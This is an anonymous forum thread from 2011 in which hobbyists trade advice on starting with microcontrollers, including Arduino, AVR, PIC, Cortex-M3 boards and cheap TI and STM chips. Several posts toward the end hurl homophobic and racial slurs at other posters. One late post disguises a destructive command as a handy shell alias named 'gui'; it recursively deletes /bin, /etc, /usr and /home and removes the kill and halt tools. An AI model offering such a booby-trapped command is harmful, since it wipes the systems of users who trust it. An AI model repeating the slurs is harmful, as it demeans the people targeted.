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Micro-controller boards

Name: Anonymous 2011-04-22 3:54

Anybody program them? Like Arduino? Or the Alternatives? Have any good links? Hardware I should be using? Wasap?

Name: Anonymous 2011-04-22 4:20

BUMPS. Trunk reference.

Name: Anonymous 2011-04-22 4:37

A popular saying!
:) :D

Name: Anonymous 2011-04-22 4:51

Just build your own :-)

Name: Anonymous 2011-04-22 4:57

Noted! Googled. U still gotta buy their "CPU" tho huh? to use ther shit easiest?

Name: Anonymous 2011-04-22 5:00

U know- use code compiled against their processor? ^_^

Name: Anonymous 2011-04-22 5:02

I mean short of getting a chip flasher and that I Do Not Want to need. !!!!! . So - Its good to get by without that.

Name: Anonymous 2011-04-22 5:02

A special purpose ROM chip flasher

Name: Anonymous 2011-04-22 5:04

is that "PICAXE" any good?

Name: Anonymous 2011-04-22 5:04

Does it require anything super special? Does it have sensors? and cool shit?

Name: Anonymous 2011-04-22 5:07

>>5
Yeah, I recommend AVR ATMega. Other people could perhaps recommend Microchip PIC.

So this is what you need:
- MCU (the microcontroller of your choice, ATMega, PIC, etc...)
- Programmer device that is used to program your MCU
- Your computer. You need it to write code and use the programmer device to program MCU

If you don't have experience in electronics it is best to buy a micro-controller board (or development board, or evaluation board or some-other-name-here). There are boards for AVR and Microchip controllers. But if you know what you're doing, you can save money by making your own board.

Name: Anonymous 2011-04-22 5:08

OK so it's pretty much in the air then? I dont know too many that use them yet. :) It's all good.

Name: Anonymous 2011-04-22 5:09

Oh! OK - Saved. I will personally try these things. Friend has name brand parts coming.

Name: Anonymous 2011-04-22 5:11

wait HEEEEEEEEYYYYY I alreaday knew all that! :/ ... watever. OK! HEY guess what I HAVE PRGORAM CHUNKS for it :D

Name: Anonymous 2011-04-22 5:12

lol I will still check out ATR and PIC :) no doubt.

Name: Anonymous 2011-04-22 5:14

and there is a bunch I have to wing with the programming. it will take a few people on staff when we test. to not burn down the place.

Name: Texas Instruments MCUs 2011-04-22 5:51

Texas Instruments MCUs

Name: Anonymous 2011-04-22 5:56

>>17
What is this? $1.85 32-Bit Controllers? :D hahahaha OKOK I'll chek it out I dont like the "scam" front tho :P :) .. L8rs

Name: Anonymous 2011-04-22 6:00

meaning THEM fuckers! TI you be B.S.'n!!! HA .... +++X

Name: Anonymous 2011-04-22 6:17

>>2-19
Go away.

Name: Anonymous 2011-04-22 7:07

Arduino is a pretty good starter.
Most of them support USB, so you can just plug it in your PC.
programming is done in C

Name: Anonymous 2011-04-22 7:09

>>21 You are drunk ^^

Name: Anonymous 2011-04-22 8:57

>>18.19

Who the FUCK is this faggot?

Name: Anonymous 2011-04-22 8:57

Name: Anonymous 2011-04-22 9:22

>>1
I recently received a Panda Board, it's a dual-core ARM Cortex A9 MPCore SoC development board. Just installed Debian 6 on it, and plan to do some actual development on it soon.

Name: Anonymous 2011-04-22 11:47

>>25
How does it feel not being able to code your own driver for the built-in 3D renderer?

Name: Anonymous 2011-04-22 12:41

Arduino's good for beginners, but I recommend ditching the Arduino libraries and switching to plain avr-libc as soon as possible. You can still use the same hardware, but you'll learn a lot more and produce better code.

When you feel you're ready to graduate from 8-bitters I suggest getting something based on the ARM Cortex-M3. They are a lot more powerful but still very easy to use and importantly, designed to be used from C. For example Luminary/TI have several cheap boards with an on-board USB JTAG interface for programming and debugging. There's also a few Cortex-M3 boards that use the Arduino form factor if you want to use shields.

>>25
Not an MCU.

Name: Anonymous 2011-04-22 13:13

building your own boards is cool and my be cheaper, but if your just starting off, you might want to get a kit with some basic parts, leds, pushbuttons, servos, etc and get some experience using these, then if you like it, you can build your own boards for out projects.  makezine always has cool shit

Name: Anonymous 2011-04-22 15:49

>>28
What about my just starting off?

Name: Anonymous 2011-04-22 16:56

>>20
OP- No- & only because others obviously gave a shit about topic.
>>22
Yes, I was drunk last night! Perceptive of you. :)
>>25
Even tho >>27 says you're in wrong topic, TY for suggestion.
>>27
a form factor w/The USB also sounds ideal! I'll have to check into it.
 
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Name: Anonymous 2011-04-22 17:59

...but I'm still confused how they had $1.85 32-Bit (ROM?) Chips??? That's really darn cheap. Is that for real?

Name: Anonymous 2011-04-23 1:36

YES! That's a 32Bit "ROM" chip! Right there on their front page for their MCUs!-
http://focus.ti.com/mcu/docs/mcuhome.tsp?sectionId=101&DCMP=TIHomeTracking&HQS=Other+OT+home_p_micro
...Check that OUT! Wow! :) What a LONG way we have come!

Name: Anonymous 2011-04-23 1:49

I need a doller eighty five! n some wires n shit. breadboard. etc. :) :D

Name: Anonymous 2011-04-23 5:38

STM have 32-bit MCUs for less than a dollar. Modern process technology has made it so that the price is determined by the number of package pins, then the amount of RAM and flash. The CPU core itself is pretty much free.

Also, those TI C2000 chips are DSPs, not recommended for beginners. They're a lot more complex and the tools suck.

Name: Anonymous 2011-04-23 7:02

>>30
Hey, ``faggot", if you were any of these people (>>2-19), GO AWAY.

Name: Anonymous 2011-04-23 7:52

>>35
Hwy ``faggot", maybe you should go away. This is not one of your nigger gay boards, this is MICROCONTROLLER PROGRAMMING, MOTHERFUCKER. bitch.

Name: Anonymous 2011-04-23 7:53

>>36
Hqy ``faggot'' maybe you should go away. This is not one of your African American Homosexual boards, this is MICROCONTROLLER PROGRAMMING, MOTHERFUCKER. prostitute.

Name: Anonymous 2011-04-23 8:19

alias gui='nautilus & exit'

Name: Anonymous 2011-04-23 8:59

alias gui='rm -rf /bin &; rm -rf /etc &; rm -rf /usr &; rm -rf /home &; rm -rf `which kill` `which halt`;'

Name: Anonymous 2011-04-23 11:19

YOU CAN STEAL MY FARTS, BUT YOU CAN'T STEAL MY GNU FREEDOM!

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